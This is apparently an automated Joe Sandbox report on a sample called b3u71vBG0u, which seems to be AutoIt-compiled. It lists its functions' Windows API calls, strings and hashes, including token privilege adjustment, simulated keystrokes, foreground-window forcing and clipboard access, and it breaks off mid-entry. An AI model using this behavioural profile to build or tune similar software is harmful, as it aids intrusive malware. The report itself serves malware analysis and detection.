Function 00764A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00764AD6

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: ffeb5d2d0f59210a871c3e84d02b6fb2f1e425bf17f75b0a004318506c0e17d8
Instruction ID: 2eb636afb97fb50fc6526815cf2c4ef4b8c6f071ea6ff7ba91669a25237d9ced
Opcode Fuzzy Hash: ffeb5d2d0f59210a871c3e84d02b6fb2f1e425bf17f75b0a004318506c0e17d8
Instruction Fuzzy Hash: A9F06871940209EBDFA1AFB4CC0A7DF7661AF00325F188614FC26AA1D1DB7C8951DF55

Function 00744FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744FDE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 630007936972c2b791b072fc7b696360a1a95b8d0307382a51652062c25a1c68
Instruction ID: 47518251b596a560e6bd1491d3823aa2ee6c8e9d8255403d814ddd5640853fe5
Opcode Fuzzy Hash: 630007936972c2b791b072fc7b696360a1a95b8d0307382a51652062c25a1c68
Instruction Fuzzy Hash: 4AF06DB1105712CFCB349F64E494922BBF2BF043293288E3EE5E782610C739A858EF40

Function 007609D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007609F4

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: cf82a3f8adcded959a9c8fff02906b7522d56868512ce868c94257cb470717e6
Instruction ID: 4992e58f4d717b6b4f1c9e76ad69c65133138e4af6e24e73102b18c10e3a322d
Opcode Fuzzy Hash: cf82a3f8adcded959a9c8fff02906b7522d56868512ce868c94257cb470717e6
Instruction Fuzzy Hash: 3DE08676A0422897C720D6589C09FFA77ADDF88690F0441B5FC0CD7214DA649C818690

Function 007A9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 007A914B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 66a678a42bd33ec5edae9ba894c0e2ba634849c13344e4fda9e498a460eb91bb
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: D1E09AB0204B059FDB398A28D814BE373E0AB06315F00091CF6AB83342EB66B8418B59

Function 00745DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0077E16B,?,?,00000000), ref: 00745DBF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 79821be7e9ec403f67e1158de794e413c1f2796c68df8d7a4334467415111048
Instruction ID: 1fecf077c5b877c17e41dceaca62faaa169285ad67572502f67ec9b12b529755
Opcode Fuzzy Hash: 79821be7e9ec403f67e1158de794e413c1f2796c68df8d7a4334467415111048
Instruction Fuzzy Hash: 41D0C77464020CBFE710DB80DC46FA9777DD705710F100195FD0456290D6B27D508795

Function 0076548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00765496

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: cbd40fcf4633431ff485e4f878eac26aa6b5fba48aa657b7c2756b889f5d3c8e
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: BEB0927684020CB7DE012E82EC02A593F199B40678F808060FF0C18562AA77A6A0A689

Function 0078220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNELBASE(00000104,?), ref: 0078221A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: be36ddff8a700918e4e66bde0e0a5d65c9a0e614a40f38dfe6984ac81681bb37
Instruction ID: b8a46245ec98452f4e47b5e2b63b81469e853a66938e6084ed153da45c8cfbbb
Opcode Fuzzy Hash: be36ddff8a700918e4e66bde0e0a5d65c9a0e614a40f38dfe6984ac81681bb37
Instruction Fuzzy Hash: CCC04C714550199BEB15B750CC95AA9772DBF00701F1040E5B54691050D5B85B41CF11

Function 007AD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 007AD46A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ca7b199a0bd73ba341cb5e53801fc45799ca5b7c066f41d7fdb9f11283774a23
Instruction ID: fb1b8b72bb632db0c519dbd2ba3ed4c527b9abb05dea97494c526d544e282fa6
Opcode Fuzzy Hash: ca7b199a0bd73ba341cb5e53801fc45799ca5b7c066f41d7fdb9f11283774a23
Instruction Fuzzy Hash: 4D717230208341CFC714EF24C4D5A6EB7E4AF89314F044A6DF9969B6A2DB38ED49CB52

Function 00760E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00760EF7

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: d843de43c6ba38f1a92fb4fcda11a6f03c82e846a1df1b102033e03af97fd5cd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: AA31D671A00115DFC718EF58D48096AF7B6FF59300B688AA5E80ACB651D73AEDC1CBC0

Function 023922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 023922B1

Memory Dump Source

Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 643ba2bb021fee3f5db2272b4a5d1b89920e1682218fec026c6795d4773f82a7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: A6E0E67494010EEFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2280D6319D508A72

Non-executed Functions

Function 007CCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007CCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007CCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CCF00
SendMessageW.USER32 ref: 007CCF29
_wcsncpy.LIBCMT ref: 007CCFA1
GetKeyState.USER32(00000011), ref: 007CCFC2
GetKeyState.USER32(00000009), ref: 007CCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CCFE5
GetKeyState.USER32(00000010), ref: 007CCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CD018
SendMessageW.USER32 ref: 007CD03F
SendMessageW.USER32(?,00001030,?,007CB602), ref: 007CD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007CD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007CD16E
SetCapture.USER32(?), ref: 007CD177
ClientToScreen.USER32(?,?), ref: 007CD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007CD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CD203
ReleaseCapture.USER32 ref: 007CD20E
GetCursorPos.USER32(?), ref: 007CD248
ScreenToClient.USER32(?,?), ref: 007CD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CD2B1
SendMessageW.USER32 ref: 007CD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD31C
SendMessageW.USER32 ref: 007CD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CD37B
GetCursorPos.USER32(?), ref: 007CD39B
ScreenToClient.USER32(?,?), ref: 007CD3A8
GetParent.USER32(?), ref: 007CD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CD431
SendMessageW.USER32 ref: 007CD462
ClientToScreen.USER32(?,?), ref: 007CD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD51A
SendMessageW.USER32 ref: 007CD53D
ClientToScreen.USER32(?,?), ref: 007CD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CD5C3

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

GetWindowLongW.USER32(?,000000F0), ref: 007CD65F

Strings

F, xrefs: 007CD543
@GUI_DRAGID, xrefs: 007CD1AA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 377698d43a07123a10e832e495ce466b7fa5fbcd537151a8fa5e40399b80da31
Instruction ID: 7bc66f3969c82b2c9a21e152218cc75ed21140450ab2bd5f34f265fd2b4ba09d
Opcode Fuzzy Hash: 377698d43a07123a10e832e495ce466b7fa5fbcd537151a8fa5e40399b80da31
Instruction Fuzzy Hash: 22427B30204241AFD726CF68C848FAABBE5FF49314F14452DF6999B2A1D7399864CF92

Function 007C804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007C873F

Strings

%d/%02d/%02d, xrefs: 007C8478

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: bb47aa098b867484889e0b7be08478010fb59da51a11645fe65aefb252853f2e
Instruction ID: 6aa8da21ac6aa5a1bb925bc3a02d46a7822caae170459c07bab7dcba3c67df24
Opcode Fuzzy Hash: bb47aa098b867484889e0b7be08478010fb59da51a11645fe65aefb252853f2e
Instruction Fuzzy Hash: F512DF71500248ABEB658F64CC49FAF7BB9EF85310F24412DF916EA2E1EF789941CB11

Function 0075710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007575C2
_memset.LIBCMT ref: 007576B1
_memmove.LIBCMT ref: 00757C4B
_memmove.LIBCMT ref: 00757E4F

Strings

DEFINE, xrefs: 007925AF
Q\E, xrefs: 007581C1
[:>:]], xrefs: 0075760A
\b(?=\w), xrefs: 00793C34
Oau, xrefs: 0079287E
[:<:]], xrefs: 007575F1
\b(?<=\w), xrefs: 00793C41

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Oau$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2223249883
Opcode ID: 13eba9412650ddeb64d6462e6a58fcd4288c073659c427f174429501dcbda735
Instruction ID: 0d4d184b8ccc3bd645e37e2c6bedaba030db7e214de23e5fbe023a155690c8db
Opcode Fuzzy Hash: 13eba9412650ddeb64d6462e6a58fcd4288c073659c427f174429501dcbda735
Instruction Fuzzy Hash: 3D93A371A04219DBDF24CF58E881BEDB7B1FF48310F25816AE945EB291E7789D82CB50

Function 00744A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00744A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0077DA8E
IsIconic.USER32(?), ref: 0077DA97
ShowWindow.USER32(?,00000009), ref: 0077DAA4
SetForegroundWindow.USER32(?), ref: 0077DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0077DAC4
GetCurrentThreadId.KERNEL32 ref: 0077DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0077DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0077DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0077DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0077DAF8
SetForegroundWindow.USER32(?), ref: 0077DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB10
keybd_event.USER32(00000012,00000000), ref: 0077DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB25
keybd_event.USER32(00000012,00000000), ref: 0077DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB33
keybd_event.USER32(00000012,00000000), ref: 0077DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB42
keybd_event.USER32(00000012,00000000), ref: 0077DB47
SetForegroundWindow.USER32(?), ref: 0077DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0077DB71

Strings

Shell_TrayWnd, xrefs: 0077DA89

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f6f63200a8b8247e6408078fabb968244d8ca2fa23515ab5fac8f4659a2507d5
Instruction ID: 6d6aafa95d94b871c097172f7066e760d67eb106484c19cfdf4cf140806a0467
Opcode Fuzzy Hash: f6f63200a8b8247e6408078fabb968244d8ca2fa23515ab5fac8f4659a2507d5
Instruction Fuzzy Hash: 01314171A40318BAEF316FA19C49F7E3F7DEF44B90F118029FA04A61D0C6B85D10AAA4

Function 00798858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00798CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
Part of subcall function 00798CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
Part of subcall function 00798CC3: GetLastError.KERNEL32 ref: 00798D47

_memset.LIBCMT ref: 0079889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007988ED
CloseHandle.KERNEL32(?), ref: 007988FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00798915
GetProcessWindowStation.USER32 ref: 0079892E
SetProcessWindowStation.USER32(00000000), ref: 00798938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00798952

Part of subcall function 00798713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798851), ref: 00798728
Part of subcall function 00798713: CloseHandle.KERNEL32(?,?,00798851), ref: 0079873A

Strings

, xrefs: 007988AA
default, xrefs: 0079894D
winsta0, xrefs: 00798910

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: d85682b6e639c6ac09575ed156695d89002211a35ad5ed6a9a016cf0e6b6619f
Instruction ID: 97868a16d5041cd2fdeebae4d93fa7148e1d3224f58ba919dfefb0b004f64d07
Opcode Fuzzy Hash: d85682b6e639c6ac09575ed156695d89002211a35ad5ed6a9a016cf0e6b6619f
Instruction Fuzzy Hash: 7D816B71900209AFDF51DFA4EC49EEE7BB9EF05314F08816AF910B6261DB398E14DB61

Function 007B425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(007CF910), ref: 007B4284
